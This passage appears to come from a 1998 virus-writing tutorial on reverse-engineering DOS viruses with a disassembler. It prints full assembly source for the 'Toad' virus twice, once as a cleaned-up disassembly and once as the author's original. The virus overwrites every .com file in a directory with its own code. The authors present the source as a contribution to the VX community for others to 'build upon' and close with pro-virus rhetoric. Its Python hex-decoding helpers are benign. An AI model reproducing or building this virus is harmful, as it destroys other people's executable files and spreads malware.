toad            proc    near                    ;was far, disassembler 
						;inconsistency


start:                                          ;start of virus code
		mov     ah,4Eh                  ;function 4eh-find first file
find_file:
		xor     cx,cx                   ;clears CX register
		mov     dx,filespec             ;12Fh points to  *.com so
						;we'll just rename it with
						;a label to make life easier

		int     21h                     ;go DOS!
		jc      no_more_files           ;If there are no more files
						;to infect (i.e. if carry 
						;flag is set) then jump here

		mov     ax,3D02h                ;open file for read/write acess
		mov     dx,9eh                  ;get file info
						;ok here's a small difference
						;in the disassembly...in which
						;sourcer had mov dx,data_1e
						;data_1e being: 9eh
						;so lets just cut out the 
						;middle man (as the author
						;probably did......
		int     21h                     ;Go dos!
						; 
		xchg    bx,ax                   ;puts file handle in bx from ax  
		mov     ah,40h                  ;function 40h-write to file 
	
		mov     cx,offset end_virus - offset find_file

						;this is the length we want to
						;write to the file we are
						;infecting...it is the same as
						;mov cx,0B4h, which is the length
						;of our virus from 100h (start
						;of .com file)
		lea dx, start                   ;essentially the same command
						;again; we are just making it
						;more 'human' for the reader.
						;this tells DOS to start
						;writing from the 'start' label,
						;which is conveniently located at
						;100h, thus same as: mov dx,100h

		int     21h                     ;go dos!
		mov     ah,3Eh                  ;function 3Eh-close file
		int     21h                     ;go dos! 
						  
		mov     ah,4Fh                  ;function 4Fh-find next file
		jmp     find_file               ;jump to find next file to
						;infect
no_more_files:
		mov     ah,9                    ;function 9-write string to
						;standard output. ie: write a
						;message on the screen
		mov     dx,offset message       ;get the message from the 
						;data segment
		int     21h                     ;go dos! 
						;  
		int     20h                     ;int 20h-DOS program 
						;terminate
filespec        db      '*.com', 0
message         db      'Congratulations! You have infected all the COM files in this ',10,13, 
		db      'directory with the Toad instructional virus. Have a nice day.',10,13,'$' 

;here we just put the message back together in a more cohesive order and
;changed the hex 0Ah, 0Dh to its decimal equivalent: 10,13.
		     
end_virus label near                 ;just our   
				     ;formal closings
toad            endp                   
seg_a           ends
		end     find_file    ;makes sense yes?  
---------------------------------------------------------------------------- 

  Now you see? It looks very clean and is even more legible than the
code produced by Sourcer.  All we have really done is give expressive
names to things that Sourcer left generic: a label such as data_1e, or a
raw hexadecimal value such as 0B4h, which became the expression
offset end_virus - offset find_file. We have also corrected any small
syntax errors which Sourcer may have produced. This is the point at which
we need to double check that the code compiles and the virus runs and
infects properly.  If bugs are encountered we can use a debugger to walk
through the executable step by step to see where we have strayed from the
original source and where specifically our errors lie.
  Alright, now it's time for the big test. Let's compare our disassembly
with Horny Toad's original source and see how it holds up.

 ----------------------------------------------------------------------------

 code    segment
	 assume  cs:code,ds:code
	 org     100h
 toad    proc    near

 first_fly:
	 mov     ah,4eh
 find_fly:
	 xor     cx,cx
	 lea     dx,comsig
	 int     21h
	 jc      wart_growth

 open_fly:
	 mov     ax,3d02h
	 mov     dx,9eh
	 int     21h

 eat_fly:
	 xchg    bx,ax
	 mov     ah,40h
	 mov     cx,offset horny - offset first_fly
	 lea     dx,first_fly
	 int     21h

 stitch_up:
	 mov     ah,3eh
	 int     21h
	 mov     ah,4fh
	 jmp     find_fly

 wart_growth:
	 mov     ah,09h
	 mov     dx,offset wart
	 int     21h

 cya:   
	 int     20h


comsig  db      "*.com",0
wart    db      'Congratulations! You have infected all the COM files in this ',10,13
	db      'directory with the Toad instructional virus. Have a nice day.',10,13,'$'
 horny   label   near
 toad    endp
 code    ends
	 end     first_fly

 -----------------------------------------------------------------------------


  Ahh...you see? Identical! That's right, using the executable file
TOAD.COM I have derived the original source code instruction for instruction
(only the label names differ). As you have probably already guessed, this
feat increases in difficulty very quickly with the complexity of the virus
you are disassembling. However, using the same intuition we used to clean up
this code, we can create logical patches and fixes in sections of the code
produced by the disassembler which would otherwise not function properly.
This is the area of disassembly where a secondary disassembler and a debugger
come in very handy for finding the problem areas created by the initial
disassembly. A true and accurate disassembly should incorporate a debugger
verifying the majority of the code produced by the disassembler.
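
  A quick complement to the debugger, not something we used above, is to
compare the reassembled binary byte for byte against the original file. The
sketch below is a generic helper in Python; the function name and the sample
bytes are our own illustration and are not taken from TOAD.COM. For a .COM
file, add 100h to the returned index to get the offset shown in the listing.

```python
def first_mismatch(original: bytes, rebuilt: bytes):
    """Return the index of the first differing byte, or None if identical."""
    for i, (a, b) in enumerate(zip(original, rebuilt)):
        if a != b:
            return i
    # One input is a prefix of the other: they differ where the shorter ends.
    if len(original) != len(rebuilt):
        return min(len(original), len(rebuilt))
    return None


# Made-up sample data standing in for two binaries read from disk.
a = bytes([0x90, 0x90, 0xC3, 0x00])
b = bytes([0x90, 0x91, 0xC3, 0x00])
where = first_mismatch(a, b)
print("identical" if where is None else "first difference at index %d" % where)
```

If the two files differ, the index tells you which instruction in the listing
to look at first in the debugger.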

  Other things to be aware of:
There are a few other things we'd like to touch on before we draw this to
a close. The first is simply that, especially when doing reverse engineering,
it is important to understand the way a virus, or any program for that
matter, functions on a 'technical' level. By this we mean you should
understand simple concepts that a surprising number of coders do not fully
understand, i.e. hexadecimal values, segment addresses, and other basic
aspects of the 8086 architecture.  We mention these because it is very likely
that you will run into some difficulty in making a disassembly due to this
very fact. Allow us to illustrate with a simple example:

Suppose you came across this line of code in a disassembly:

mov dx,12Fh

O.K., so we know we are loading the value 12Fh into DX (the data register),
and that it is most likely an offset. So we go to offset 12Fh and we find:

 seg000:012F   db 2Ah
 seg000:0130   db 2Eh
 seg000:0131   db 63h
 seg000:0132   db 6Fh
 seg000:0133   db 6Dh
 seg000:0134   db 0

WTF is that? This is the point where most new coders stop and say "Fuck it
anyways!" and it can be frustrating to see 50-200 lines of this, but with
a bit of luck we can make this fall into place.  It's really just ASCII
text in hexadecimal form!
Watch:

 db 2Ah ;*
 db 2Eh ;.
 db 63h ;c
 db 6Fh ;o
 db 6Dh ;m
 db 0   ;null terminator (end of the string)

Of course! It's the filespec db '*.com',0, the type of file we are searching
for. It was simply the form in which it was presented to us that was
confusing. That is what much of reverse engineering is about: taking the code
OUT of the machine language and putting it BACK into a more understandable
human language. As for converting hex to ASCII and vice versa, many
disassemblers will do it for you and some will not. In any case it proves
worthwhile to get a good book on assembly which will provide you with a hex
to ASCII table.
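
If no table is at hand, the conversion can also be done in a few lines of
Python. This is a minimal sketch; the function name decode_asciiz is our own,
and the bytes are the six values from the listing at 012Fh above.

```python
# Bytes copied from the listing at seg000:012F through seg000:0134.
raw = bytes([0x2A, 0x2E, 0x63, 0x6F, 0x6D, 0x00])


def decode_asciiz(data: bytes) -> str:
    """Return the ASCII text up to (not including) the first zero byte."""
    end = data.find(b"\x00")
    if end == -1:          # no terminator found: take everything
        end = len(data)
    return data[:end].decode("ascii")


print(decode_asciiz(raw))  # prints *.com
```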

  Another thing to be aware of is some common errors made by disassemblers.
One such error is when the disassembler decides to translate a block of
assembly instructions into a block of data.  When viewed, the block will look
like a chunk of useless, meaningless data. Unfortunately, that chunk of "data"
might be as important as an interrupt handler.  The key to understanding, or
shall we say translating, the data will be to look at the program code.
Think to yourself: "What is missing in the program?  How and when is the
chunk of data being called?"  You might even have to take a look at it
through a debugger and possibly surround the code with breakpoints to see
what it actually affects.  In the end, your only option might be to
substitute the "data" with your own assembly instructions.  Be very careful
when attempting to do this.
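
One rough way to narrow the search is to mark which db blocks really are
text, so that whatever is left over becomes the candidate for misread code.
The Python sketch below is only a heuristic of our own (instruction bytes can
happen to be printable too), and the sample bytes and the 100h base are
assumptions made for illustration.

```python
import re


def printable_runs(blob: bytes, base: int = 0x100, min_len: int = 4):
    """Yield (offset, text) for each printable-ASCII run of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7E]{%d,}" % min_len)
    for match in pattern.finditer(blob):
        yield base + match.start(), match.group().decode("ascii")


# Made-up sample: three non-text bytes, a string, then more non-text bytes.
sample = b"\x90\x90\xc3" + b"*.com\x00" + b"\x00\x01"
for offset, text in printable_runs(sample):
    print("%04Xh  %r" % (offset, text))
```

Blocks that show up here are probably genuine strings; a long db block that
never shows up deserves a closer look in the debugger.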

Yet another important fact to keep in mind when examining viruses is that
many viruses quite literally do NOT want to be examined.  That is to say,
they have been programmed with anti-anti-virus, anti-heuristic,
anti-debugger, and anti-disassembler routines which make examination an
even more difficult process, and sometimes even a risky one. The same rule we
learned as children when dealing with wild animals applies here: if you
cannot identify an animal, don't get close enough to let it harm you.
This is a pretty safe rule to live by, but I'm sure some of you won't live by
it, as we didn't, as children or now ;) Either way, you should keep yourself
on top of ideas and advances in armored programming.  Most of the time
armored programming is not harmful and just creates an immense amount of
difficulty in examining the code. However, we have heard of and seen some
pretty nasty tricks laid inside virii, waiting for the anti-virus researcher
to examine them. One is hooking int 3 (the breakpoint interrupt, which is
essential when examining programs in debug) and redirecting the debugger,
when run upon the virus, to do anything: from simply displaying a witty
message on the debug screen and exiting without allowing the code to be
examined, all the way to wiping entire disks.
Though it is fairly rare to come across a virus that will actually punish the
reverse engineer, they do exist and we felt the necessity to inform you of
their existence.  Be smart, use your background knowledge of the virus
you are examining, and we're sure that the beast won't bite back.

  Hopefully, this has prepared you to begin doing quality disassemblies
of virus code.  You will learn A LOT about assembly language doing them,
and you will be contributing to the VX community by making precise source
code to popular and effective virii available again for others to learn from
and build upon.  So, until next time, viewing audience: the computer is a
wonderful microcosm in which man can play god.  Is the AV holding the hands
of evolution back?  Ask Darwin.

				    - Horny Toad and Opic [Codebreakers '98]